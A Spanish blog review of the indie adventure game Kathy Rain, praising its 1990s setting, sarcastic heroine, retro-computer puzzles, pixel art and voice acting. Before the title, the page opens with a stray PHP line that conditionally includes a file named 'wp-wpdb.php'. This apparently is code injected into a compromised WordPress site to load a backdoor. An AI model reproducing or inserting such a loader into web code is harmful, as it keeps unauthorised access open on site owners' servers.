if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Kathy Rain – La Fortaleza de LeChuck

Análisis Kathy Rain

Ante la vorágine de lanzamientos indies en plataformas digitales de estos últimos años, muchos títulos pasan a veces desapercibidos, como Kathy Rain, una aventura gráfica de corte clásico del estudio Clifftop Games, que he tenido el placer de jugar y quiero recomendaros.

kathy-rain

Para empezar, tengo que decir que hace unos meses desconocía la existencia de Kathy Rain, sin embargo, gracias a un artículo de Kotaku que explicaba las bajas ventas del título, y el posible cese de la compañía, descubrí el juego. Al echar un vistazo a las imágenes, esos gráficos pixelados me hicieron pensar en Wadjet Eye, luego leí algunas críticas de Steam y observé que el escaso éxito no parecía ser causa de un mal juego, quizá era debido a la falta de visibilidad y el bombardeo continuo de lanzamientos que hace que nos perdamos muchos juegos. Sin dudarlo me lancé a por él y no me arrepiento.

Kathy Rain es una aventura gráfica ambientada en 1995 y, en ella, encarnamos a Kathy, una universitaria un tanto rebelde que vive una placida vida estudiantil en un campus. Sin embargo, un día, su compañera de habitación le informa que su abuelo, un piloto retirado del ejercito, ha fallecido y pronto será su funeral. Kathy hace tiempo que no mantiene contacto con su familia pero aún así decide asistir al entierro. Allí se reencuentra con su abuela y ambas se ponen al día y rememoran el extraño accidente que inició el declive del abuelo. Además, Kathy encuentra en el domicilio algunas enigmáticas pertenencias que dejó. A partir de aquí comienza la gran investigación de Kathy Rain donde la realidad y la ficción se entremezclan y nada parece tener sentido.

Uno de los atractivos del juego es sin duda Kathy, su personalidad inconformista y los comentarios mordaces nos ofrecerán momentos muy divertidos, sobre todo en los diálogos, donde frecuentemente solo podremos elegir entre varias frases sarcásticas, aquí no hay medias tintas. También vale la pena observar cualquier punto de la pantalla o personaje para obtener una desternillante descripción; por ejemplo, un momento muy divertido fue cuando me puse a mirar los pósteres de pelis de mi compañera, con ella presente, y ésta replicaba todas las frases locas de Kathy. No obstante, no todo es felicidad y jolgorio, Kathy arrastra una pesada carga en su interior que iremos viendo en el transcurso del juego y el jugador tendrá que decidir hasta que punto quiere compartirla. Al pasar largas horas en compañía de Kathy, vi muchos parecidos con Daria o Jessica Jones, personajes femeninos dotados de gran personalidad que protagonizan series del mismo nombre, donde a través de frases irónicas hacen su particular crítica social.

kathy-rain2

Tengo que reconocerlo, me apasiona la década de los 90, tanto la tecnología como toda la cultura que nos dejó, y Kathy Rain se hace eco de muchos de aquellos cacharros, películas y series, así que veremos muchas referencias a series de culto como Twin Peaks y otros guiños a producciones de la década. Sin embargo, los 90 también estarán presentes en la decoración, personajes y puzles. Y ya que he nombrado los puzles, hablemos de ellos. En realidad Kathy Rain tiene una dificultad baja, pero no es algo negativo, todo lo contrario, los puzles son frescos, divertidos y originales, especialmente me gustaron los que se realizaban con la ayuda de un ordenador, concretamente con esos viejos 486 que estaban conectados a monitores enormes que se calentaban como cafeteras. También serán importantes los disquetes de 3 1/2 que albergarán todo tipo de utilidades primitivas para sentirnos como un retro-hacker. Ah, y las grabaciones en cassette, en fin paro que me pongo nostálgica. Pero esto no es todo en cuanto a puzles, ¿que necesitamos entretener a un individuo molesto? Siempre podremos tirar de algún personaje excéntrico que nos haga el trabajo sucio o utilizar nuestro vicio insano para socializar. En definitiva, salvo un rompecabezas del principio (maldito maletín) y algunos en la parte final, no han apostado por puzles enrevesados, sino por divertidos y variados que tengan sentido con la investigación y la trama.

En cuanto a gráficos, como se puede apreciar, es puro arte pixelado, los escenarios son bonitos, detallados y con una acertada paleta de colores que realzan el sentido paranormal de algunas pantallas. También vemos pantallas muy distintivas: el bosque misterioso, el cementerio, la comisaría… El viaje a través de ellas aporta dinamismo a la aventura sin pasar demasiado rato en las mismas. Por otro lado, las animaciones también son muy llamativas, me encanta la de Kathy arrancando y lanzándose a la carretera a los lomos de su moto. Poco más que decir de este apartado, es otra de las aventuras que surgen del motor gráfico AGS que utilizan frecuentemente compañías como Wadjet. Permitidme hacer una pequeña mención al apartado sonoro, ya que la música del juego me ha sorprendido por sus bonitas melodías melancólicas y misteriosas. También hay que destacar el gran trabajo de doblaje, dirigido por Dave Gilbert de Wadjet Eye, que contó con un gran equipo de profesionales. Me encanta la actriz detrás de la voz de Kathy, que encaja con ese aspecto rebelde de nuestra protagonista, por no hablar de la voz adorable de la abuelita de Kathy.

kathy-rain3

Kathy Rain es una estupenda aventura ambientada en los 90 con una contundente protagonista, una historia sobrenatural y un viaje al subconsciente que te atrapa hasta el final. ¿Lo malo? que está en inglés pero no descartan traducirla si tiene el apoyo suficiente. Ahora mismo la tienes de oferta en Steam.